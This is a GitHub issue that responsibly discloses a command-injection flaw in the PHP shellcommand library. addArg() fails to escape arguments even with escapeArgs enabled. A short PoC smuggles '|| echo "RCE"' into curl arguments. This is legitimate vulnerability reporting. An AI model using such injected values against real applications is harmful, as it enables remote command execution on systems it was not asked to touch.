Closed
Description
I expect that addArg()
escapes all arguments preventing possibility of command injection from untrusted sources.
Because in the README.md
I see:
-
Handle argument escaping
-
$escapeArgs
: Whether to escape any argument passed throughaddArg()
. Default istrue
.
But it is not actually happens.
PoC:
<?php
require_once 'vendor/autoload.php';
use mikehaertl\shellcommand\Command;
$command = new Command(array(
'command' => 'curl',
'escapeArgs' => true,
));
// In this example "escapeArgs" is set to "true", but escaping is not happens.
$command->addArg('http://example.com --wrong-argument || echo "RCE 1"');
$command->execute();
echo $command->getOutput(); // RCE 1
$command = new Command(array(
'command' => 'curl http://example.com',
'escapeArgs' => true,
));
$command->addArg('http://example.com');
// In this example, the second argument will be escaped properly, but the first one - not.
$command->addArg('--header foo --wrong-argument || echo "RCE 2" ||', 'bar');
$command->execute();
echo $command->getOutput(); // RCE 2
Disclaimer
This thread was initially started as a private email conversation. @mikehaertl asked me to open an issue here.
Metadata
Metadata
Assignees
Labels
No labels